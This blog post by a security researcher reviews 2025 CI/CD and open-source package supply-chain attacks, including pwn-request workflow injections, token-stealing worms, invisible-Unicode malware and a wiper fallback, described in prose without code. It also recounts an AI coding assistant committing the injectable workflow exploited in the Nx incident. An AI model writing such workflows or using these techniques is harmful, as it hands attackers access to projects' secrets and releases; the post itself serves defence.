Defensive Research, Weaponized: The 2025 State of Pipeline Security

Written by François Proulx | Dec 8, 2025 2:48:20 PM

December 8th 2025, by François Proulx, VP of Security Research @ BoostSecurity.io

TL;DR: 2025 didn’t give us a new, magical Supply Chain vuln class; instead it gave us attackers who finally started reading our manuals.

From Ultralytics’ pull_request_target 0‑day (where a BreachForums post indicates they used our own poutine scanner to find it) through Kong, tj-actions, GhostAction, Nx, GlassWorm and both Shai‑Hulud waves, the common pattern wasn’t typosquats but Pipeline Parasitism: living off CI/CD, maintainer accounts and developer endpoints using the same tools and patterns we published to defend them.

The vuln mechanics stayed boring: shell injections and over‑privileged tokens. But they were operationalized with worms, invisible Unicode payloads, blockchain C2, and even wiper failsafes.

Thankfully, platforms are finally improving, yet “pwn request” is here to stay; the only sustainable answer is to treat pipelines as production systems and publish future research assuming adversaries are our most diligent readers!

Table of Contents

Introduction: The Uncomfortable Baseline

Chapter 1: The turning point: Ultralytics & BreachForums

Chapter 2: Pipeline Parasitism goes mainstream

Chapter 3: Invisible Enemies: Unicode & GlassWorm

Chapter 4: Ecosystem Scale: The Shai-Hulud Worms

Chapter 5: Analysis: Research as a Requirements Document

Conclusion: Defensible by Design

Introduction: The Uncomfortable Baseline

In 2025, the unsettling part wasn’t that Supply Chain attacks suddenly became possible: it was that they started to look uncomfortably familiar. Campaign after campaign read like someone had taken years of CI/CD vulnerability research, SLSA Threat Model diagrams, conference exploitation demos and simply ran them in production.

This article is NOT an end of year “Top 10 Most Bad Ass Breaches” recap. It’s the story of a pivot point: the year where pipeline hardening guides, LOTP talks, and Open Source scanners stopped being just defensive artifacts and became part of the offensive toolkit. If you spent 2023-2024 mapping how PRs, bots, and build runners could go wild, 2025 felt like watching those PTSD-inducing Tabletop whiteboard scenarios replayed at ecosystem scale.

To understand why, we have to start with the uncomfortable baseline: we already knew the foundations were fragile. I hate to say it, but I saw that movie playing in my head several years ago as I exploited my first “pwn request” and had my own “Oh Shit!” moment.

Fragile foundations, well‑documented

Filippo Valsorda captured the mood of 2025 in his essay “State of Supply Chain Compromise”. The thesis was simple and uncomfortable: our ecosystem is structurally fragile, compromise is inevitable, and we should stop pretending otherwise.

By the time his essay circulated through Blue Team Slack channels and newsletters, a loose coalition of researchers and builders had already spent a better part of the past couple of years stress‑testing CI/CD systems:

Exposing how GitHub Actions, GitLab CI, Tekton, CircleCI and friends routinely run untrusted Pull Request code from forks with overly privileged secrets.
Demonstrating Poisoned Pipeline Execution (PPE) and “pwn request” patterns where a single Pull Request (or GitHub Issue / Comment) can often trivially allow an attack to exfiltrate secrets (signing keys, tokens, etc.) and pivot to compromise artifact registries and release pipelines.
Publishing tooling and methodologies to make this repeatable at scale.

A large portion of the work we did was intentionally public. We wanted maintainers and platform teams to see how bad things were. We responsibly disclosed hundreds of those vulnerabilities, so much so that we had to build an agentic pipeline to triage, automate validation and generate draft reports.

We Open Sourced scanners like poutine to statically catch unsafe workflow patterns. We wrote articles like “Weaponizing Dependabot” to explain how seemingly benign automation can be chained into high‑impact attacks, and “Split‑Second Side Doors” to show how Bot‑Delegated TOCTOU in CI can break your core Threat Model assumptions even when humans think they are “approving” safe changes.

We talked at several conferences, we were invited on podcasts, we created a whole CTF training. Many of us were early contributors and cheerleaders for efforts like SLSA’s Source and Build track, trying to drag pipelines out of the “2005 PHP Web App” era of secure coding and into something more principled.

We weren’t the only ones listening.

Chapter 1: The turning point: Ultralytics & BreachForums

Figure 1: The smoking gun. Threat actors explicitly citing our defensive tools.

Every field has a moment where a vague concern crystallizes into hard evidence. For CI/CD Supply Chain security, for me, that moment came in December 2024 with the Ultralytics incident.

A few months earlier, during routine research, we had flagged a painfully obvious injection bug in ultralytics/actions, a GitHub Action used in the YOLOv5 ecosystem. The pattern was depressingly familiar:

A pull_request_target workflow.
Attacker-controlled head branch name interpolated straight into a Bash shell injection.
GitHub Personal Access Token loaded in memory during the execution of the build.

A textbook “pwn request” PPE scenario. We made a note to come back to it. Other fires were burning.

In early December, news broke: Ultralytics’ PyPI package had been trojanized. A compromised GitHub Actions workflow had exfiltrated publishing credentials and shipped cryptomining payloads to unsuspecting ML users.

That was bad. The next discovery was worse.

Looking at Dark Web chatter using Flare, we found a freshly created BreachForums account. The actor’s posting history looked… concise:

A first post: OpSec 101 🤦🏻‍♂️.
A second post, 12 hours before the Ultralytics compromise, dropping the exact 0‑day chain against ultralytics/actions: complete with references to our own LOTP and poutine as to how the vulnerability had been found.
A third post, soon after the incident, bragging that someone had used “PRs to leak secrets from build pipelines,” dropped a Monero miner, caused chaos, but made little money.
The account never logged in again.

This wasn’t vague speculation about “attackers probably read our blogs.” This was a threat actor explicitly crediting research tools and methodology, weaponizing it almost verbatim, and then disappearing.

It was the smoking gun.

From hackathon frustration to pipeline telemetry

We were frustrated. We had seen the bug months before. Our intuition was that it could have been caught even earlier, by looking at the ecosystem from the outside, correlating suspicious workflow changes, package publishes, and maintainer activity.

So we did what engineers do when they’re annoyed: we built more plumbing.

Over a hackathon, we stitched together what became our Package Threat Hunter pipeline, ingesting the GitHub public events firehose, layering on some secret sauce, and trying to catch Build Pipeline exploits “in the act” instead of reverse‑engineering them weeks later.

Ten days later, Kong’s Kubernetes Ingress Controller incident happened, an unauthorized 3.4.0 release pushed through their CI, using legitimate build scripts and signing paths, but shipping a cryptominer.

Package Threat Hunter had captured the whole thing, minute by minute.

That experience locked in a mental model that 2025 would keep reinforcing: the interesting compromises were no longer simple typosquats. They were pipeline‑centric operations, where attackers:

Find or create a CI/CD foothold.
Reuse as much of the legitimate release machinery as possible.
Blend their payloads into official‑looking artifacts and ecosystem‑trusted channels.

And increasingly, they were doing it using our own research as a field guide.

Chapter 2: Pipeline Parasitism goes mainstream

The first quarter of 2025 made it clear that Ultralytics and Kong weren’t anomalies.

Actions on Actions: tj-actions/changed-files

In March, we saw what happens when an attacker decides to treat GitHub Actions themselves as a transitive Supply Chain.

By compromising the maintainer account for tj-actions/changed-files, a hugely popular Action used in tens of thousands of workflows, an adversary was able to backdoor all existing versions, injecting a one‑liner shell payload that ran in the context of each consumer’s workflow.

This wasn’t subtle. It was “GitHub‑Actions‑on‑GitHub‑Actions”, a meta Supply Chain attack squarely aligned with the PPE patterns offensive researchers had been demonstrating for years. A popular vulnerable GitHub Action is the holy grail; the blast radius can be gigantic. It’s a side-door 0-day to any workflow having it as a dependency.

Figure 2: The meme from our Under The Radar talk slide deck now reality (early 2024)

GitHub’s response was equally telling: they took the unusual step of globally yanking tags, knowingly breaking builds to cut off impact. That’s the kind of move platforms make when they recognize they’re dealing with systemic, not local, risk.

GhostAction: workflows as malware

By September, GhostAction pushed the idea further. Here, the “malware” wasn’t in a dependency: it was a GitHub Actions workflow.

Compromised accounts (ATO) received a malicious YAML file wired to run on every push and pull request. The logic was simple but devastating: on every execution, the workflow walked through all available secrets it could reach: GitHub, Docker Hub, NPM, PyPI, and cloud providers, then bundled them up and exfiltrated them off to attacker‑controlled infrastructure.

GitGuardian’s telemetry later showed hundreds of accounts and thousands of secrets impacted. More importantly, GhostAction behaved like a crude GitHub‑native worm. Once the malicious YAML landed in a few places, new tokens were exfiltrated and the cycle repeated.

Nx and the s1ngularity campaign

The Nx incident followed a similar script to Kong, with a twist. The root cause was depressingly familiar: a flawed GitHub Actions workflow wired to pull_request_target that shoved unsanitized PR title and body straight into a shell, giving attackers high‑privilege RCE in the repo. The gut punch came when Adnan Khan pointed out that this workflow hadn’t been hand‑written at all: it was generated and committed by Claude Code. In other words, the attacker walked through a CI backdoor that an AI had casually stamped into the codebase for them before chaining other AI CLIs for recon in the malware itself. This is exactly why we’ve been wiring tools like poutine into MCP servers and code assistants: if you don’t put a LOTP‑aware linter in the loop, your “helper” can quietly gift attackers the perfect pull_request_target 0‑day.

Grafana: canaries in the CI coal mine

If Nx was a reminder that AI can write you a perfect CI 0‑day, Grafana was the reminder that good instrumentation can still save you.

In April 2025, Grafana Labs had their own pull_request_target‑powered PPE: an insecure workflow let an attacker run a carefully crafted branch name through a shell, exfiltrating environment variables and a handful of credentials from a GitHub Actions job. On paper, that’s the same story as Ultralytics or Nx, a classic pwn‑request bug wired straight into CI.

The difference is how it ended. Grafana had seeded their environment with canary tokens, high‑value‑looking AWS keys and other decoys whose only purpose was to scream if anyone touched them. When the attacker validated one of those keys, Grafana’s team got an immediate page, swarmed the incident, rotated everything, and confirmed there was no production or customer impact. They followed up by hardening their workflows, leaning on tools like Zizmor, a scanner in the same family as poutine that catches vulnerable Actions at scale, and later wrote publicly about how they design and place canaries.

Grafana’s experience is worth calling out because it shows that Pipeline Parasitism isn’t automatically a death sentence for a well‑instrumented, well‑staffed project. Most small, understaffed but wildly popular dependencies will never have a dedicated SRE on pager duty; expecting them to hand‑craft canaries and incident playbooks is wishful thinking. The lesson here is less “everyone should do what Grafana did” and more “this kind of tripwire should exist as a platform‑level feature”. Registries, CI providers, or security tooling can make it cheap and mostly automatic for the long tail, not just a bespoke trick reserved for the Grafanas of the world.

Chapter 3: Invisible Enemies: Unicode & GlassWorm

As defenders got better at spotting crude pipeline abuse, attackers adapted in two directions: invisibility and persistence. Two campaigns in particular: the first Unicode‑steganography NPM malware and GlassWorm, felt like they were written specifically to humiliate our assumptions about what “obvious” malware looks like.

The os-info-checker-es6 family looked like yet another forgettable system‑info helper until fellow researchers pulled it apart and realized the malicious logic wasn’t just obfuscated, it was missing from the tools we trusted to show us code. The payload was woven through Unicode Private Use Area (PUA) which are zero‑width characters in a way that made the bad branches completely invisible in VS Code, vim, Emacs, and GitHub’s web diff. You could review the file line by line and never see the teeth. That shock is what led us to build an Open Source tool we called puant (“stinky” in French), whose only job is to sniff out suspicious PUA and zero‑width usage so maintainers have at least a fighting chance of noticing when a diff is lying to them. Pair that with a C2 channel that hid commands and exfiltrated data inside Google Calendar events, and you get tradecraft that feels a lot closer to Lazarus Group / “Contagious Interview”‑style operations than to a bored cryptominer.

GlassWorm adapted this technique to target VS Code and Open VSX publishers directly. They used the invisible Unicode trick to hide activation logic within benign-looking extensions, but paired it with a sophisticated worming capability that used stolen tokens to infect the maintainers’ other projects. Perhaps most alarmingly, they hardened their infrastructure by using the Solana blockchain for C2 communication, ensuring their command channel remained up even if their servers were nuked.

Taken together, the first Unicode‑PUA NPM malware and GlassWorm were a visceral reminder that “just read the diff” or “just check the extension reviews” is no longer a sufficient review strategy, and that developer endpoints: IDEs and extension ecosystems are now first‑class targets in their own right, not collateral damage.

Chapter 4: Ecosystem Scale: The Shai-Hulud Worms

By late summer, attackers stopped sniping individual packages and went straight after the humans who maintain the building blocks of the JavaScript ecosystem. The Great NPM Heist against Qix‑maintained extremely popular and critical packages (chalk, debug, ansi-styles, and many more) was pure social engineering: a convincing phishing campaign spoofing NPM support and a fake TOTP management page were enough to turn a single maintainer account into a distribution hub for malicious versions of dozens of core libraries. The payload was a crypto stealer quietly swapping wallet addresses in any app that handled them. It never fully realized its potential, but it proved the point: compromise the right person, and you can poison billions of weekly installs.

The first Shai‑Hulud wave took that insight and automated it. Instead of using a stolen NPM token to backdoor a single package, the worm’s post install hook enumerated every package owned by the victim maintainer, injected a huge obfuscated payload, and republished new versions. Exfiltration flowed into GitHub repositories acting as dropboxes for stolen tokens and secrets. Within days, “a few compromised packages” had become hundreds of trojanized libraries and thousands of downstream repos touched, a maintainer‑level worm, not a one‑off incident.

Shai‑Hulud 2.0 was the same concept turned up to eleven. Compromised packages dropped a preinstall script that installed or located the Bun runtime and spawned a heavily obfuscated bun_environment.js. On any machine with an NPM token, the worm walked the maintainer’s entire portfolio, backdooring and republishing packages en masse and spreading across several hundreds of packages. The payload was tuned for developer endpoints and CI: it hunted GitHub PATs, NPM credentials, cloud keys, SSH keys, then exfiltrated them via public GitHub repos literally branded “Sha1‑Hulud: The Second Coming,” often mixing data from multiple victims.

On machines with enough access, Shai‑Hulud 2.0 went further and registered the host as a GitHub Actions self‑hosted runner, wiring in attacker‑controlled workflows so that revoking NPM tokens wasn’t enough, you now had a durable, GitHub‑mediated RCE path back into a victim's laptop. And when it couldn’t steal or persist, no network, no usable tokens, it sometimes fell back to a blunt option: recursively deleting everything writable under the user’s home directory. At that point you’re not dealing with “just” a Supply Chain compromise, but with an ecosystem worm, a developer‑endpoint infostealer, a GitHub-proxied backdoor, and a wiper rolled into one, all rooted in the same lesson as the Heist: maintainers are the real root of trust.

Chapter 5: Analysis: Research as a Requirements Document

Looking across Ultralytics, Kong, tj-actions, GhostAction, Nx, GlassWorm, the Great NPM Heist, and both Shai‑Hulud waves, a pattern emerges on the pipeline and maintainer side of the house:

The core vulnerability classes are not new. They are the same boring primitives we have been talking about for a decade: unsafe string interpolation into shells, over‑privileged tokens and runners in CI, maintainer account takeover, and sketchy package install hooks combined with excessive post‑publish trust.
What’s new is the level of operationalization. Attackers now use tooling to scan for the exact anti‑patterns defenders look for and build worm‑like propagation mechanisms across maintainer portfolios and ecosystems, and design obfuscation and C2 channels specifically to defeat human review and commodity detection.
Our own research has become a roadmap for this specific class of attacks. Blog posts and talks about PPE, Dependabot abuse, and Bot‑Delegated TOCTOU lay out exactly how a misconfigured pull_request_target or overeager bot can become an RCE and secrets factory. Open Source tools like poutine or Gato‑X encode those patterns in code, making it trivial to scan large swaths of GitHub for promising CI/CD anti‑patterns. Hardening guides and disclosure timelines document which combinations of triggers, permissions, and secrets lead to which impacts, effectively prioritizing targets for anyone willing to read.

Campaigns like rand-user-agent or os-info-checker-es6 live in a slightly different bucket: they were born malicious, crafted from day one as watering‑hole artifacts (tiny helpers, convenience libraries, “just‑trust‑me” interview tools) rather than compromises of long‑standing, trusted packages. They don’t need our research to exist; registry incentives and the economics of “npm install whatever Stack Overflow says” are enough.

But even there, the ecosystem reaction is shaped by the same research. The reason we recognized the Unicode PUA trick, built tools like puant, and could talk about blockchain‑backed C2 with any precision is because the community has spent years poking holes in how we review, ship, and consume code.

Attackers are doing what we would do in their position: reading everything, cloning everything, scripting everything. That doesn’t mean we should stop publishing research. It does mean we need to internalize a hard truth: there is no longer a clean line between “defensive” and “offensive” Supply Chain research.

Every hardening guide is also a gap analysis for the next campaign. Every proof‑of‑concept is a template. Every detection rule is a hint about how to evade the next version.

Conclusion: Defensible by Design

The good news is that the ecosystem is responding. GitHub is on the verge (in early December 2025) to tighten, partially, the Threat Model around pull_request_target and branch‑protected environments, chipping away at the “easy mode” PPE paths that powered Ultralytics and many copycats. NPM has changed token policies, including expiration for publish tokens, directly in response to the first Shai‑Hulud wave, making stealing publish tokens slightly less attractive. Extension marketplaces are starting to treat publisher accounts and signing keys as critical infrastructure, not just UX plumbing.

These changes matter. Some of the most egregious low‑hanging fruit is finally disappearing.

But as Clint Gibler put it in the TL;DRsec #307 newsletter referring to Shai‑Hulud 2.0, there’s a different kind of unease too: after each ecosystem‑level incident, we spin up a flurry of >80% overlapping vendor posts that can feel, in his words, like “a lot of duplicate work,” more marketing than new signal. The real opportunity cost isn’t just readers’ attention, it’s all the expert time that could be going into longer‑term, solve‑this‑class‑of‑problem work instead of re‑describing the same campaign every few months.

Right now, most CI/CD platforms are effectively RCE As A Service. We’ve handed every repo a Swiss‑army knife of triggers, runners, and integrations, plus a Threat Model you only really understand if you treat the docs as light bedtime horror. There are too many choices, too many sharp edges, and too many caveats that only surface after someone chains them into a real attack.

That’s barely acceptable for well‑funded product teams; it’s untenable for the tiny, under‑resourced Open Source projects that end up underpinning half the internet. We can’t keep playing the “SSO tax” game where enterprise‑grade detection and response sits behind paywalls while the weekend pet project, the one that quietly becomes that XKCD comic everyone loves to share about a single unpaid maintainer holding up the world, gets the most dangerous defaults and the fewest guardrails, and we all keep shrugging and reposting the joke instead of fixing the incentives.

If 2025 was the year attackers industrialized Living Off The Pipeline, 2026 needs to be the year we start designing pipelines and ecosystems that are defensible by design.

That means more batteries‑included, paved‑road platforms and fewer sharp edges, especially for Open Source: safer defaults, opinionated workflows behavior, and built‑in tripwires that make the secure path the easy path instead of an expert‑only side quest.

That points to a few concrete shifts:

Treat pipelines as production systems, not glue code. Model GitHub Actions, GitLab CI, Tekton and friends as always‑on RCE‑as‑a‑Service platforms, not scripting conveniences; apply real Threat Modeling, enforce least privilege on tokens and runners, and separate untrusted PR evaluation from trusted release processes instead of letting everything run in one amorphous “build” stage.
Harden the human perimeter around maintainers and developers. Make hardware keys and phishing‑resistant MFA table stakes for registry and marketplace accounts, give maintainers security awareness that matches their actual risk profile, and run endpoint protection tuned for developer workflows rather than generic office laptops.
Invest in ecosystem‑level telemetry and coordination. Share behavioral patterns for pipeline‑centric attacks across vendors, build rapid cross‑registry response muscle for maintainer compromises, and support community efforts like community malware databases (OpenSSF / OSV / OSMDB), sandboxing infrastructure, and canary‑style tripwires that can be baked into CI and registries themselves, the kind of instrumentation that helped Grafana turn a live pull_request_target exploit into a quickly contained non-event, but now made cheap and mostly automatic for the long tail of tiny, heavily‑used packages.
Publish research with an eye toward abuse. Focus proofs‑of‑concept on classes of issues rather than turnkey exploit chains, pair offensive insights with concrete, implementable mitigations, and assume by default that adversaries will be your most diligent readers.

Finally, we should keep doing what worked best in 2025: collaborating as humans.

As an olive branch to ourselves, we could make that collaboration a little more intentional: a small, vendor‑neutral Signal group where the people who actually reverse this stuff, ship the PoCs, and write the hardening guides can compare notes outside of weeks where marketing puts us in the line of fire. A place to trade weird telemetry, half‑baked ideas, and “does this look like the next Shai-Hulud or am I just tired?” questions, ideally without accidentally re‑creating a "SignalGate" of our own by inviting the threat actors into the chat 🤣.

The reason many of these campaigns were understood and contained as quickly as they were is that individuals across companies and communities quietly shared intel. People like Adnan Khan pushing the boundaries of CI/CD exploitation so others could understand the risk. Rami McCarthy sending a friendly “URGENT PSA - [redacted] got hit by the Nx issue. Revoke everything. Sorry!” DM when telemetry suggested one of our own employees had been hit. William “Woody” Woodruff keeping tools like Zizmor sharp so GitHub workflow bugs don’t stay bugs for long. Paul McCarty curating the Open Source Malware database and building tools like undelete that let us see what really happens on shady Asian NPM mirrors. Charlie Eriksen being one of the first on scene reversing new blobs so the rest of us don’t have to start from raw hex. Aviad Hahami et al. doing a massive forensics job retracing the first innings of complex campaigns like tj-actions. Analysts painstakingly teasing signal out of obfuscated bundles. Maintainers disclosing painful compromises in public so others could learn.

The irony of 2025 is that while attackers were busy weaponizing our research, the most effective defense was still relationships, Signal groups, DMs, and late‑night calls where we compared notes and turned isolated incidents into a coherent picture.

If we do this right, the story we tell a year from now won’t be “look how bad Shai‑Hulud 3.0 was.”

It will be: attackers kept reading our manuals and it stopped helping them.

View full post